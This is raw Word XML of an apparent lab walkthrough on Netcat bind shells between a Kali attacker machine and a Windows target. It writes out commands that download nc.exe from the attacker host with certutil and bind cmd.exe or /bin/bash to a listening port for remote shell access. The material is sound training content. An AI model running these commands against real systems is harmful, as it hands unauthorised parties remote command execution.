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6ADD" w14:textId="5DCFA8A0" w:rsidR="00853ABF" w:rsidRDefault="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>Bind Shells</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21AE26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Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022E17C" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053151A7" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> Your task is to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> a bind shell with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427530AC" w14:textId="3CE3C8AA" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9590B" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRDefault="00481FE1"/>
    <w:p w14:paraId="3B0511FE" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> Open the lab link to access the attacker Kali GUI instance and the target Windows GUI instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90025B" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>These systems can be accessed via the tab switcher at the top of the lab as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB74908" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">This lab requires two systems </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> provide you with an understanding of how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> communicates either via a listener or when connecting to a port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8138B" w14:textId="77777777" w:rsidR="00644BF4" w:rsidRDefault="00644BF4" w:rsidP="00481FE1"/>
    <w:p w14:paraId="517987EE" w14:textId="30EA1804" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C5E87B" wp14:editId="240026C3">
            <wp:extent cx="4790049" cy="1971040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1096903866" name="Picture 1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ontent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858" b="53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428" cy="197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08F00" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> Transferring the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> executable to the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195ACF2A" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> a bind shell with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>, we will need to transfer the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> executable to the target system running Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA41C5" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>Kali Linux comes pre-packaged with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> executable, we can host the executable by setting up an HTTP server with Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949EF4B" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>The first step will involve navigating to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/share/windows-binaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> directory. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DEA17" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA1FAA" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>/share/windows-binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D9626" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">We can then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> an HTTP server with Python within this directory by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355FE08" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF44A8" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9D360" w14:textId="163E71D6" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74A1CFBE" wp14:editId="00E69FF4">
            <wp:extent cx="5156465" cy="1612983"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="11446880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88019" name="Picture 11446880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C465" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">You will now need to identify the IP address of your Kali Linux </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>system,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> this can be done by running the following command on the Kali system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03312B37" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10538C43" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7038B16B" w14:textId="14982D17" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">As shown in the following screenshot, the Kali Linux IP address in this case is </w:t>
      </w:r>
      <w:r w:rsidR="00644BF4" w:rsidRPr="00644BF4">
        <w:t>10.10.40.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t>. In your case, this might be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB46DD" w14:textId="0DC67DB2" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D0BFED" wp14:editId="0A492D97">
            <wp:extent cx="5848651" cy="3467278"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9096787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78790" name="Picture 9096787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62D4" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>You will now need to navigate to the target system running windows by clicking on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> tab at the top of the lab as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E30FD" w14:textId="2D068CB2" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1"/>
    <w:p w14:paraId="5B7A28CF" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">You will then need to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> a command prompt, navigate to the Desktop directory and run the following command to download the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> executable from the web server being hosted on the Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C714D" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59138A96" w14:textId="2DE641D9" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> -f http://</w:t>
      </w:r>
      <w:r w:rsidR="00644BF4" w:rsidRPr="00644BF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00644BF4" w:rsidRPr="00644BF4">
        <w:t>10.10.40.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t>/nc.exe nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB880D2" w14:textId="1CFDF6C2" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F039C1" wp14:editId="71CFBA5E">
            <wp:extent cx="4750044" cy="831893"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="14252460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46058" name="Picture 14252460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DA73" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> Setting up the bind shell listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF31F4E" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>Now that we have transferred the </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> executable to the Windows system we can begin by setting up the bind shell listener on the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904CFA6" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In this case, we will be connecting to a bind shell listener on the Windows system, as a result, we will need to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> listener on the Windows system and configure it to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t> when a connection is made from a client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689EE4C0" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA8499" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DBC2C" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>nc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 1234 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA8AE9D" w14:textId="33DCF7C3" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F19D0FA" wp14:editId="3CDCB3AE">
            <wp:extent cx="4705592" cy="933498"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4566197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19716" name="Picture 4566197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9394" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>We can now connect to the bind shell listener running on the Windows system from the Kali Linux system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D66BC" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B2F8F" w14:textId="77FF0088" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 10.</w:t>
      </w:r>
      <w:r w:rsidR="00644BF4">
        <w:t>3.30.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC650E" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>As shown in the following screenshot, connecting to the bind shell listener will provide us with a remote shell on the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D9757" w14:textId="719012D7" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2FAB74" wp14:editId="56DB06FD">
            <wp:extent cx="4972306" cy="1428823"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4134276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27628" name="Picture 4134276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A27F" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">This process can also be reversed, for example, if we wanted to obtain a bind shell on the Kali Linux system from the Windows system, we would need to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> listener on the Kali Linux system and configure it to execute a shell like </w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DBD53" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04F529" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E2831" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 1234 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98DB36" w14:textId="797BC8A9" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00644BF4" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CCDF9A7" wp14:editId="07522BB8">
            <wp:extent cx="4730993" cy="1320868"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6617898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89877" name="Picture 6617898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6050" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>We can now connect to the bind shell listener on the Kali Linux system from the Windows system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61B1A8" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE956A5" w14:textId="1D8F7820" w:rsidR="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t>nc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 10.10.</w:t>
      </w:r>
      <w:r w:rsidR="00644BF4">
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00644BF4">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCAC86B" w14:textId="6F607E84" w:rsidR="002A3E19" w:rsidRPr="00481FE1" w:rsidRDefault="002A3E19" w:rsidP="00481FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E29040" wp14:editId="1E4071F4">
            <wp:extent cx="5099312" cy="1117657"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="12494361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6134" name="Picture 12494361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BEE5" w14:textId="77777777" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1">
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve">As shown in the following screenshot, connecting to the bind shell listener will provide us with a remote shell on the Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00481FE1">
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038157EC" w14:textId="7A573EA3" w:rsidR="00481FE1" w:rsidRPr="00481FE1" w:rsidRDefault="00481FE1" w:rsidP="00481FE1"/>
    <w:p w14:paraId="1E7B1A4F" w14:textId="4F6CCF58" w:rsidR="00481FE1" w:rsidRDefault="00481FE1"/>
    <w:p w14:paraId="5AA90ED7" w14:textId="6F81F8A7" w:rsidR="00481FE1" w:rsidRDefault="002A3E19">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
